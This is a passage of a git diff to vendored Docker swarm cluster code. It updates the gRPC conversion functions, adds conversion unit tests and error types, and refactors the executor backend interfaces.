+ MaxFailureRatio: updateConfig.MaxFailureRatio, + } + + 
switch updateConfig.FailureAction { + case types.UpdateFailureActionPause, "": + converted.FailureAction = swarmapi.UpdateConfig_PAUSE + case types.UpdateFailureActionContinue: + converted.FailureAction = swarmapi.UpdateConfig_CONTINUE + case types.UpdateFailureActionRollback: + converted.FailureAction = swarmapi.UpdateConfig_ROLLBACK + default: + return nil, fmt.Errorf("unrecognized update failure action %s", updateConfig.FailureAction) + } + if updateConfig.Monitor != 0 { + converted.Monitor = gogotypes.DurationProto(updateConfig.Monitor) + } + + switch updateConfig.Order { + case types.UpdateOrderStopFirst, "": + converted.Order = swarmapi.UpdateConfig_STOP_FIRST + case types.UpdateOrderStartFirst: + converted.Order = swarmapi.UpdateConfig_START_FIRST + default: + return nil, fmt.Errorf("unrecognized update order %s", updateConfig.Order) + } + + return converted, nil +} + +func networkAttachmentSpecFromGRPC(attachment swarmapi.NetworkAttachmentSpec) *types.NetworkAttachmentSpec { + return &types.NetworkAttachmentSpec{ + ContainerID: attachment.ContainerID, + } +} + +func taskSpecFromGRPC(taskSpec swarmapi.TaskSpec) (types.TaskSpec, error) { + taskNetworks := make([]types.NetworkAttachmentConfig, 0, len(taskSpec.Networks)) + for _, n := range taskSpec.Networks { + netConfig := types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverOpts: n.DriverAttachmentOpts} + taskNetworks = append(taskNetworks, netConfig) + } + + t := types.TaskSpec{ + Resources: resourcesFromGRPC(taskSpec.Resources), + RestartPolicy: restartPolicyFromGRPC(taskSpec.Restart), + Placement: placementFromGRPC(taskSpec.Placement), + LogDriver: driverFromGRPC(taskSpec.LogDriver), + Networks: taskNetworks, + ForceUpdate: taskSpec.ForceUpdate, + } + + switch taskSpec.GetRuntime().(type) { + case *swarmapi.TaskSpec_Container, nil: + c := taskSpec.GetContainer() + if c != nil { + t.ContainerSpec = containerSpecFromGRPC(c) + } + case *swarmapi.TaskSpec_Generic: + g := 
taskSpec.GetGeneric() + if g != nil { + switch g.Kind { + case string(types.RuntimePlugin): + var p runtime.PluginSpec + if err := proto.Unmarshal(g.Payload.Value, &p); err != nil { + return t, errors.Wrap(err, "error unmarshalling plugin spec") + } + t.PluginSpec = &p + } + } + case *swarmapi.TaskSpec_Attachment: + a := taskSpec.GetAttachment() + if a != nil { + t.NetworkAttachmentSpec = networkAttachmentSpecFromGRPC(*a) + } + t.Runtime = types.RuntimeNetworkAttachment + } + + return t, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go b/vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go new file mode 100644 index 0000000000..ad5f0d4494 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go @@ -0,0 +1,308 @@ +package convert // import "github.com/docker/docker/daemon/cluster/convert" + +import ( + "testing" + + containertypes "github.com/docker/docker/api/types/container" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/api/types/swarm/runtime" + swarmapi "github.com/docker/swarmkit/api" + google_protobuf3 "github.com/gogo/protobuf/types" + "gotest.tools/assert" +) + +func TestServiceConvertFromGRPCRuntimeContainer(t *testing.T) { + gs := swarmapi.Service{ + Meta: swarmapi.Meta{ + Version: swarmapi.Version{ + Index: 1, + }, + CreatedAt: nil, + UpdatedAt: nil, + }, + SpecVersion: &swarmapi.Version{ + Index: 1, + }, + Spec: swarmapi.ServiceSpec{ + Task: swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Container{ + Container: &swarmapi.ContainerSpec{ + Image: "alpine:latest", + }, + }, + }, + }, + } + + svc, err := ServiceFromGRPC(gs) + if err != nil { + t.Fatal(err) + } + + if svc.Spec.TaskTemplate.Runtime != swarmtypes.RuntimeContainer { + t.Fatalf("expected type %s; received %T", swarmtypes.RuntimeContainer, svc.Spec.TaskTemplate.Runtime) + } +} + +func TestServiceConvertFromGRPCGenericRuntimePlugin(t *testing.T) { + kind := 
string(swarmtypes.RuntimePlugin) + url := swarmtypes.RuntimeURLPlugin + gs := swarmapi.Service{ + Meta: swarmapi.Meta{ + Version: swarmapi.Version{ + Index: 1, + }, + CreatedAt: nil, + UpdatedAt: nil, + }, + SpecVersion: &swarmapi.Version{ + Index: 1, + }, + Spec: swarmapi.ServiceSpec{ + Task: swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Generic{ + Generic: &swarmapi.GenericRuntimeSpec{ + Kind: kind, + Payload: &google_protobuf3.Any{ + TypeUrl: string(url), + }, + }, + }, + }, + }, + } + + svc, err := ServiceFromGRPC(gs) + if err != nil { + t.Fatal(err) + } + + if svc.Spec.TaskTemplate.Runtime != swarmtypes.RuntimePlugin { + t.Fatalf("expected type %s; received %T", swarmtypes.RuntimePlugin, svc.Spec.TaskTemplate.Runtime) + } +} + +func TestServiceConvertToGRPCGenericRuntimePlugin(t *testing.T) { + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + Runtime: swarmtypes.RuntimePlugin, + PluginSpec: &runtime.PluginSpec{}, + }, + Mode: swarmtypes.ServiceMode{ + Global: &swarmtypes.GlobalService{}, + }, + } + + svc, err := ServiceSpecToGRPC(s) + if err != nil { + t.Fatal(err) + } + + v, ok := svc.Task.Runtime.(*swarmapi.TaskSpec_Generic) + if !ok { + t.Fatal("expected type swarmapi.TaskSpec_Generic") + } + + if v.Generic.Payload.TypeUrl != string(swarmtypes.RuntimeURLPlugin) { + t.Fatalf("expected url %s; received %s", swarmtypes.RuntimeURLPlugin, v.Generic.Payload.TypeUrl) + } +} + +func TestServiceConvertToGRPCContainerRuntime(t *testing.T) { + image := "alpine:latest" + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + ContainerSpec: &swarmtypes.ContainerSpec{ + Image: image, + }, + }, + Mode: swarmtypes.ServiceMode{ + Global: &swarmtypes.GlobalService{}, + }, + } + + svc, err := ServiceSpecToGRPC(s) + if err != nil { + t.Fatal(err) + } + + v, ok := svc.Task.Runtime.(*swarmapi.TaskSpec_Container) + if !ok { + t.Fatal("expected type swarmapi.TaskSpec_Container") + } + + if v.Container.Image != image { + t.Fatalf("expected image 
%s; received %s", image, v.Container.Image) + } +} + +func TestServiceConvertToGRPCGenericRuntimeCustom(t *testing.T) { + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + Runtime: "customruntime", + }, + Mode: swarmtypes.ServiceMode{ + Global: &swarmtypes.GlobalService{}, + }, + } + + if _, err := ServiceSpecToGRPC(s); err != ErrUnsupportedRuntime { + t.Fatal(err) + } +} + +func TestServiceConvertToGRPCIsolation(t *testing.T) { + cases := []struct { + name string + from containertypes.Isolation + to swarmapi.ContainerSpec_Isolation + }{ + {name: "empty", from: containertypes.IsolationEmpty, to: swarmapi.ContainerIsolationDefault}, + {name: "default", from: containertypes.IsolationDefault, to: swarmapi.ContainerIsolationDefault}, + {name: "process", from: containertypes.IsolationProcess, to: swarmapi.ContainerIsolationProcess}, + {name: "hyperv", from: containertypes.IsolationHyperV, to: swarmapi.ContainerIsolationHyperV}, + {name: "proCess", from: containertypes.Isolation("proCess"), to: swarmapi.ContainerIsolationProcess}, + {name: "hypErv", from: containertypes.Isolation("hypErv"), to: swarmapi.ContainerIsolationHyperV}, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + ContainerSpec: &swarmtypes.ContainerSpec{ + Image: "alpine:latest", + Isolation: c.from, + }, + }, + Mode: swarmtypes.ServiceMode{ + Global: &swarmtypes.GlobalService{}, + }, + } + res, err := ServiceSpecToGRPC(s) + assert.NilError(t, err) + v, ok := res.Task.Runtime.(*swarmapi.TaskSpec_Container) + if !ok { + t.Fatal("expected type swarmapi.TaskSpec_Container") + } + assert.Equal(t, c.to, v.Container.Isolation) + }) + } +} + +func TestServiceConvertFromGRPCIsolation(t *testing.T) { + cases := []struct { + name string + from swarmapi.ContainerSpec_Isolation + to containertypes.Isolation + }{ + {name: "default", to: containertypes.IsolationDefault, from: swarmapi.ContainerIsolationDefault}, + 
{name: "process", to: containertypes.IsolationProcess, from: swarmapi.ContainerIsolationProcess}, + {name: "hyperv", to: containertypes.IsolationHyperV, from: swarmapi.ContainerIsolationHyperV}, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + gs := swarmapi.Service{ + Meta: swarmapi.Meta{ + Version: swarmapi.Version{ + Index: 1, + }, + CreatedAt: nil, + UpdatedAt: nil, + }, + SpecVersion: &swarmapi.Version{ + Index: 1, + }, + Spec: swarmapi.ServiceSpec{ + Task: swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Container{ + Container: &swarmapi.ContainerSpec{ + Image: "alpine:latest", + Isolation: c.from, + }, + }, + }, + }, + } + + svc, err := ServiceFromGRPC(gs) + if err != nil { + t.Fatal(err) + } + + assert.Equal(t, c.to, svc.Spec.TaskTemplate.ContainerSpec.Isolation) + }) + } +} + +func TestServiceConvertToGRPCNetworkAtachmentRuntime(t *testing.T) { + someid := "asfjkl" + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + Runtime: swarmtypes.RuntimeNetworkAttachment, + NetworkAttachmentSpec: &swarmtypes.NetworkAttachmentSpec{ + ContainerID: someid, + }, + }, + } + + // discard the service, which will be empty + _, err := ServiceSpecToGRPC(s) + if err == nil { + t.Fatalf("expected error %v but got no error", ErrUnsupportedRuntime) + } + if err != ErrUnsupportedRuntime { + t.Fatalf("expected error %v but got error %v", ErrUnsupportedRuntime, err) + } +} + +func TestServiceConvertToGRPCMismatchedRuntime(t *testing.T) { + // NOTE(dperny): an earlier version of this test was for code that also + // converted network attachment tasks to GRPC. that conversion code was + // removed, so if this loop body seems a bit complicated, that's why. 
+ for i, rt := range []swarmtypes.RuntimeType{ + swarmtypes.RuntimeContainer, + swarmtypes.RuntimePlugin, + } { + for j, spec := range []swarmtypes.TaskSpec{ + {ContainerSpec: &swarmtypes.ContainerSpec{}}, + {PluginSpec: &runtime.PluginSpec{}}, + } { + // skip the cases, where the indices match, which would not error + if i == j { + continue + } + // set the task spec, then change the runtime + s := swarmtypes.ServiceSpec{ + TaskTemplate: spec, + } + s.TaskTemplate.Runtime = rt + + if _, err := ServiceSpecToGRPC(s); err != ErrMismatchedRuntime { + t.Fatalf("expected %v got %v", ErrMismatchedRuntime, err) + } + } + } +} + +func TestTaskConvertFromGRPCNetworkAttachment(t *testing.T) { + containerID := "asdfjkl" + s := swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Attachment{ + Attachment: &swarmapi.NetworkAttachmentSpec{ + ContainerID: containerID, + }, + }, + } + ts, err := taskSpecFromGRPC(s) + if err != nil { + t.Fatal(err) + } + if ts.NetworkAttachmentSpec == nil { + t.Fatal("expected task spec to have network attachment spec") + } + if ts.NetworkAttachmentSpec.ContainerID != containerID { + t.Fatalf("expected network attachment spec container id to be %q, was %q", containerID, ts.NetworkAttachmentSpec.ContainerID) + } + if ts.Runtime != swarmtypes.RuntimeNetworkAttachment { + t.Fatalf("expected Runtime to be %v", swarmtypes.RuntimeNetworkAttachment) + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go index 606e00a69b..ae97a4b61d 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go @@ -1,13 +1,13 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "fmt" "strings" - "time" types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + 
"github.com/docker/swarmkit/ca" + gogotypes "github.com/gogo/protobuf/types" ) // SwarmFromGRPC converts a grpc Cluster to a Swarm. @@ -29,7 +29,17 @@ func SwarmFromGRPC(c swarmapi.Cluster) types.Swarm { EncryptionConfig: types.EncryptionConfig{ AutoLockManagers: c.Spec.EncryptionConfig.AutoLockManagers, }, + CAConfig: types.CAConfig{ + // do not include the signing CA cert or key (it should already be redacted via the swarm APIs) - + // the key because it's secret, and the cert because otherwise doing a get + update on the spec + // can cause issues because the key would be missing and the cert wouldn't + ForceRotate: c.Spec.CAConfig.ForceRotate, + }, + }, + TLSInfo: types.TLSInfo{ + TrustRoot: string(c.RootCA.CACert), }, + RootRotationInProgress: c.RootCA.RootRotation != nil, }, JoinTokens: types.JoinTokens{ Worker: c.RootCA.JoinTokens.Worker, @@ -37,27 +47,33 @@ func SwarmFromGRPC(c swarmapi.Cluster) types.Swarm { }, } - heartbeatPeriod, _ := ptypes.Duration(c.Spec.Dispatcher.HeartbeatPeriod) + issuerInfo, err := ca.IssuerFromAPIRootCA(&c.RootCA) + if err == nil && issuerInfo != nil { + swarm.TLSInfo.CertIssuerSubject = issuerInfo.Subject + swarm.TLSInfo.CertIssuerPublicKey = issuerInfo.PublicKey + } + + heartbeatPeriod, _ := gogotypes.DurationFromProto(c.Spec.Dispatcher.HeartbeatPeriod) swarm.Spec.Dispatcher.HeartbeatPeriod = heartbeatPeriod - swarm.Spec.CAConfig.NodeCertExpiry, _ = ptypes.Duration(c.Spec.CAConfig.NodeCertExpiry) + swarm.Spec.CAConfig.NodeCertExpiry, _ = gogotypes.DurationFromProto(c.Spec.CAConfig.NodeCertExpiry) for _, ca := range c.Spec.CAConfig.ExternalCAs { swarm.Spec.CAConfig.ExternalCAs = append(swarm.Spec.CAConfig.ExternalCAs, &types.ExternalCA{ Protocol: types.ExternalCAProtocol(strings.ToLower(ca.Protocol.String())), URL: ca.URL, Options: ca.Options, + CACert: string(ca.CACert), }) } // Meta swarm.Version.Index = c.Meta.Version.Index - swarm.CreatedAt, _ = ptypes.Timestamp(c.Meta.CreatedAt) - swarm.UpdatedAt, _ = 
ptypes.Timestamp(c.Meta.UpdatedAt) + swarm.CreatedAt, _ = gogotypes.TimestampFromProto(c.Meta.CreatedAt) + swarm.UpdatedAt, _ = gogotypes.TimestampFromProto(c.Meta.UpdatedAt) // Annotations - swarm.Spec.Name = c.Spec.Annotations.Name - swarm.Spec.Labels = c.Spec.Annotations.Labels + swarm.Spec.Annotations = annotationsFromGRPC(c.Spec.Annotations) return swarm } @@ -98,11 +114,19 @@ func MergeSwarmSpecToGRPC(s types.Spec, spec swarmapi.ClusterSpec) (swarmapi.Clu spec.Raft.ElectionTick = uint32(s.Raft.ElectionTick) } if s.Dispatcher.HeartbeatPeriod != 0 { - spec.Dispatcher.HeartbeatPeriod = ptypes.DurationProto(time.Duration(s.Dispatcher.HeartbeatPeriod)) + spec.Dispatcher.HeartbeatPeriod = gogotypes.DurationProto(s.Dispatcher.HeartbeatPeriod) } if s.CAConfig.NodeCertExpiry != 0 { - spec.CAConfig.NodeCertExpiry = ptypes.DurationProto(s.CAConfig.NodeCertExpiry) + spec.CAConfig.NodeCertExpiry = gogotypes.DurationProto(s.CAConfig.NodeCertExpiry) + } + if s.CAConfig.SigningCACert != "" { + spec.CAConfig.SigningCACert = []byte(s.CAConfig.SigningCACert) + } + if s.CAConfig.SigningCAKey != "" { + // do propagate the signing CA key here because we want to provide it TO the swarm APIs + spec.CAConfig.SigningCAKey = []byte(s.CAConfig.SigningCAKey) } + spec.CAConfig.ForceRotate = s.CAConfig.ForceRotate for _, ca := range s.CAConfig.ExternalCAs { protocol, ok := swarmapi.ExternalCA_CAProtocol_value[strings.ToUpper(string(ca.Protocol))] @@ -113,6 +137,7 @@ func MergeSwarmSpecToGRPC(s types.Spec, spec swarmapi.ClusterSpec) (swarmapi.Clu Protocol: swarmapi.ExternalCA_CAProtocol(protocol), URL: ca.URL, Options: ca.Options, + CACert: []byte(ca.CACert), }) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/task.go b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go index d0cf89c288..72e2805e1e 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/task.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go @@ -1,70 +1,58 @@ 
-package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "strings" types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" ) // TaskFromGRPC converts a grpc Task to a Task. -func TaskFromGRPC(t swarmapi.Task) types.Task { - if t.Spec.GetAttachment() != nil { - return types.Task{} - } - containerConfig := t.Spec.Runtime.(*swarmapi.TaskSpec_Container).Container +func TaskFromGRPC(t swarmapi.Task) (types.Task, error) { containerStatus := t.Status.GetContainer() - networks := make([]types.NetworkAttachmentConfig, 0, len(t.Spec.Networks)) - for _, n := range t.Spec.Networks { - networks = append(networks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + taskSpec, err := taskSpecFromGRPC(t.Spec) + if err != nil { + return types.Task{}, err } - task := types.Task{ - ID: t.ID, - Annotations: types.Annotations{ - Name: t.Annotations.Name, - Labels: t.Annotations.Labels, - }, - ServiceID: t.ServiceID, - Slot: int(t.Slot), - NodeID: t.NodeID, - Spec: types.TaskSpec{ - ContainerSpec: containerSpecFromGRPC(containerConfig), - Resources: resourcesFromGRPC(t.Spec.Resources), - RestartPolicy: restartPolicyFromGRPC(t.Spec.Restart), - Placement: placementFromGRPC(t.Spec.Placement), - LogDriver: driverFromGRPC(t.Spec.LogDriver), - Networks: networks, - }, + ID: t.ID, + Annotations: annotationsFromGRPC(t.Annotations), + ServiceID: t.ServiceID, + Slot: int(t.Slot), + NodeID: t.NodeID, + Spec: taskSpec, Status: types.TaskStatus{ State: types.TaskState(strings.ToLower(t.Status.State.String())), Message: t.Status.Message, Err: t.Status.Err, }, - DesiredState: types.TaskState(strings.ToLower(t.DesiredState.String())), + DesiredState: types.TaskState(strings.ToLower(t.DesiredState.String())), + GenericResources: GenericResourcesFromGRPC(t.AssignedGenericResources), } // Meta task.Version.Index = 
t.Meta.Version.Index - task.CreatedAt, _ = ptypes.Timestamp(t.Meta.CreatedAt) - task.UpdatedAt, _ = ptypes.Timestamp(t.Meta.UpdatedAt) + task.CreatedAt, _ = gogotypes.TimestampFromProto(t.Meta.CreatedAt) + task.UpdatedAt, _ = gogotypes.TimestampFromProto(t.Meta.UpdatedAt) - task.Status.Timestamp, _ = ptypes.Timestamp(t.Status.Timestamp) + task.Status.Timestamp, _ = gogotypes.TimestampFromProto(t.Status.Timestamp) if containerStatus != nil { - task.Status.ContainerStatus.ContainerID = containerStatus.ContainerID - task.Status.ContainerStatus.PID = int(containerStatus.PID) - task.Status.ContainerStatus.ExitCode = int(containerStatus.ExitCode) + task.Status.ContainerStatus = &types.ContainerStatus{ + ContainerID: containerStatus.ContainerID, + PID: int(containerStatus.PID), + ExitCode: int(containerStatus.ExitCode), + } } // NetworksAttachments for _, na := range t.Networks { - task.NetworksAttachments = append(task.NetworksAttachments, networkAttachementFromGRPC(na)) + task.NetworksAttachments = append(task.NetworksAttachments, networkAttachmentFromGRPC(na)) } if t.Status.PortStatus == nil { - return task + return task, nil } for _, p := range t.Status.PortStatus.Ports { @@ -77,5 +65,5 @@ func TaskFromGRPC(t swarmapi.Task) types.Task { }) } - return task + return task, nil } diff --git a/vendor/github.com/docker/docker/daemon/cluster/errors.go b/vendor/github.com/docker/docker/daemon/cluster/errors.go new file mode 100644 index 0000000000..9ec716b1ba --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/errors.go @@ -0,0 +1,61 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +const ( + // errNoSwarm is returned on leaving a cluster that was never initialized + errNoSwarm notAvailableError = "This node is not part of a swarm" + + // errSwarmExists is returned on initialize or join request for a cluster that has already been activated + errSwarmExists notAvailableError = "This node is already part of a swarm. 
Use \"docker swarm leave\" to leave this swarm and join another one." + + // errSwarmJoinTimeoutReached is returned when cluster join could not complete before timeout was reached. + errSwarmJoinTimeoutReached notAvailableError = "Timeout was reached before node joined. The attempt to join the swarm will continue in the background. Use the \"docker info\" command to see the current swarm status of your node." + + // errSwarmLocked is returned if the swarm is encrypted and needs a key to unlock it. + errSwarmLocked notAvailableError = "Swarm is encrypted and needs to be unlocked before it can be used. Please use \"docker swarm unlock\" to unlock it." + + // errSwarmCertificatesExpired is returned if docker was not started for the whole validity period and they had no chance to renew automatically. + errSwarmCertificatesExpired notAvailableError = "Swarm certificates have expired. To replace them, leave the swarm and join again." + + // errSwarmNotManager is returned if the node is not a swarm manager. + errSwarmNotManager notAvailableError = "This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager." 
+) + +type notAllowedError string + +func (e notAllowedError) Error() string { + return string(e) +} + +func (e notAllowedError) Forbidden() {} + +type notAvailableError string + +func (e notAvailableError) Error() string { + return string(e) +} + +func (e notAvailableError) Unavailable() {} + +type configError string + +func (e configError) Error() string { + return string(e) +} + +func (e configError) InvalidParameter() {} + +type invalidUnlockKey struct{} + +func (invalidUnlockKey) Error() string { + return "swarm could not be unlocked: invalid key provided" +} + +func (invalidUnlockKey) Unauthorized() {} + +type notLockedError struct{} + +func (notLockedError) Error() string { + return "swarm is not locked" +} + +func (notLockedError) Conflict() {} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go index 0f1da38558..1f2312ab40 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go @@ -1,10 +1,12 @@ -package executor +package executor // import "github.com/docker/docker/daemon/cluster/executor" import ( + "context" "io" "time" "github.com/docker/distribution" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" "github.com/docker/docker/api/types/container" @@ -12,39 +14,40 @@ import ( "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/network" swarmtypes "github.com/docker/docker/api/types/swarm" + containerpkg "github.com/docker/docker/container" clustertypes "github.com/docker/docker/daemon/cluster/provider" + networkSettings "github.com/docker/docker/daemon/network" "github.com/docker/docker/plugin" - "github.com/docker/docker/reference" + volumeopts "github.com/docker/docker/volume/service/opts" "github.com/docker/libnetwork" 
"github.com/docker/libnetwork/cluster" networktypes "github.com/docker/libnetwork/types" "github.com/docker/swarmkit/agent/exec" - "golang.org/x/net/context" ) // Backend defines the executor component for a swarm agent. type Backend interface { CreateManagedNetwork(clustertypes.NetworkCreateRequest) error - DeleteManagedNetwork(name string) error + DeleteManagedNetwork(networkID string) error FindNetwork(idName string) (libnetwork.Network, error) - SetupIngress(req clustertypes.NetworkCreateRequest, nodeIP string) error - PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + SetupIngress(clustertypes.NetworkCreateRequest, string) (<-chan struct{}, error) + ReleaseIngress() (<-chan struct{}, error) CreateManagedContainer(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) ContainerStart(name string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error ContainerStop(name string, seconds *int) error - ContainerLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error + ContainerLogs(context.Context, string, *types.ContainerLogsOptions) (msgs <-chan *backend.LogMessage, tty bool, err error) ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error ActivateContainerServiceBinding(containerName string) error DeactivateContainerServiceBinding(containerName string) error UpdateContainerServiceConfig(containerName string, serviceConfig *clustertypes.ServiceConfig) error ContainerInspectCurrent(name string, size bool) (*types.ContainerJSON, error) - ContainerWaitWithContext(ctx context.Context, name string) error + ContainerWait(ctx context.Context, name string, condition containerpkg.WaitCondition) (<-chan containerpkg.StateStatus, error) ContainerRm(name string, config *types.ContainerRmConfig) error ContainerKill(name string, sig uint64) error - 
SetContainerSecretStore(name string, store exec.SecretGetter) error + SetContainerDependencyStore(name string, store exec.DependencyGetter) error SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error + SetContainerConfigReferences(name string, refs []*swarmtypes.ConfigReference) error SystemInfo() (*types.Info, error) - VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) Containers(config *types.ContainerListOptions) ([]*types.Container, error) SetNetworkBootstrapKeys([]*networktypes.EncryptionKey) error DaemonJoinsCluster(provider cluster.Provider) @@ -54,8 +57,19 @@ type Backend interface { UnsubscribeFromEvents(listener chan interface{}) UpdateAttachment(string, string, string, *network.NetworkingConfig) error WaitForDetachment(context.Context, string, string, string, string) error - GetRepository(context.Context, reference.NamedTagged, *types.AuthConfig) (distribution.Repository, bool, error) - LookupImage(name string) (*types.ImageInspect, error) PluginManager() *plugin.Manager PluginGetter() *plugin.Store + GetAttachmentStore() *networkSettings.AttachmentStore +} + +// VolumeBackend is used by an executor to perform volume operations +type VolumeBackend interface { + Create(ctx context.Context, name, driverName string, opts ...volumeopts.CreateOption) (*types.Volume, error) +} + +// ImageBackend is used by an executor to perform image operations +type ImageBackend interface { + PullImage(ctx context.Context, image, tag, platform string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + GetRepository(context.Context, reference.Named, *types.AuthConfig) (distribution.Repository, bool, error) + LookupImage(name string) (*types.ImageInspect, error) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go index f82f8b54d3..fdf1ee2ec7 100644 
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go @@ -1,30 +1,35 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "context" "encoding/base64" "encoding/json" + "errors" "fmt" "io" "os" + "runtime" "strings" "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/events" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/daemon" "github.com/docker/docker/daemon/cluster/convert" executorpkg "github.com/docker/docker/daemon/cluster/executor" - "github.com/docker/docker/reference" + volumeopts "github.com/docker/docker/volume/service/opts" "github.com/docker/libnetwork" "github.com/docker/swarmkit/agent/exec" "github.com/docker/swarmkit/api" "github.com/docker/swarmkit/log" - "github.com/docker/swarmkit/protobuf/ptypes" - "golang.org/x/net/context" + gogotypes "github.com/gogo/protobuf/types" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" "golang.org/x/time/rate" ) @@ -32,21 +37,25 @@ import ( // are mostly naked calls to the client API, seeded with information from // containerConfig. 
type containerAdapter struct { - backend executorpkg.Backend - container *containerConfig - secrets exec.SecretGetter + backend executorpkg.Backend + imageBackend executorpkg.ImageBackend + volumeBackend executorpkg.VolumeBackend + container *containerConfig + dependencies exec.DependencyGetter } -func newContainerAdapter(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*containerAdapter, error) { - ctnr, err := newContainerConfig(task) +func newContainerAdapter(b executorpkg.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend, task *api.Task, node *api.NodeDescription, dependencies exec.DependencyGetter) (*containerAdapter, error) { + ctnr, err := newContainerConfig(task, node) if err != nil { return nil, err } return &containerAdapter{ - container: ctnr, - backend: b, - secrets: secrets, + container: ctnr, + backend: b, + imageBackend: i, + volumeBackend: v, + dependencies: dependencies, }, nil } @@ -54,16 +63,16 @@ func (c *containerAdapter) pullImage(ctx context.Context) error { spec := c.container.spec() // Skip pulling if the image is referenced by image ID. - if _, err := digest.ParseDigest(spec.Image); err == nil { + if _, err := digest.Parse(spec.Image); err == nil { return nil } // Skip pulling if the image is referenced by digest and already // exists locally. - named, err := reference.ParseNamed(spec.Image) + named, err := reference.ParseNormalizedNamed(spec.Image) if err == nil { if _, ok := named.(reference.Canonical); ok { - _, err := c.backend.LookupImage(spec.Image) + _, err := c.imageBackend.LookupImage(spec.Image) if err == nil { return nil } @@ -86,7 +95,10 @@ func (c *containerAdapter) pullImage(ctx context.Context) error { pr, pw := io.Pipe() metaHeaders := map[string][]string{} go func() { - err := c.backend.PullImage(ctx, c.container.image(), "", metaHeaders, authConfig, pw) + // TODO @jhowardmsft LCOW Support: This will need revisiting as + // the stack is built up to include LCOW support for swarm. 
+ platform := runtime.GOOS + err := c.imageBackend.PullImage(ctx, c.container.image(), "", platform, metaHeaders, authConfig, pw) pw.CloseWithError(err) }() @@ -137,8 +149,8 @@ func (c *containerAdapter) pullImage(ctx context.Context) error { } func (c *containerAdapter) createNetworks(ctx context.Context) error { - for _, network := range c.container.networks() { - ncr, err := c.container.networkCreateRequest(network) + for name := range c.container.networksAttachments { + ncr, err := c.container.networkCreateRequest(name) if err != nil { return err } @@ -147,7 +159,11 @@ func (c *containerAdapter) createNetworks(ctx context.Context) error { if _, ok := err.(libnetwork.NetworkNameError); ok { continue } - + // We will continue if CreateManagedNetwork returns PredefinedNetworkError error. + // Other callers still can treat it as Error. + if _, ok := err.(daemon.PredefinedNetworkError); ok { + continue + } return err } } @@ -156,15 +172,15 @@ func (c *containerAdapter) createNetworks(ctx context.Context) error { } func (c *containerAdapter) removeNetworks(ctx context.Context) error { - for _, nid := range c.container.networks() { - if err := c.backend.DeleteManagedNetwork(nid); err != nil { + for name, v := range c.container.networksAttachments { + if err := c.backend.DeleteManagedNetwork(v.Network.ID); err != nil { switch err.(type) { case *libnetwork.ActiveEndpointsError: continue case 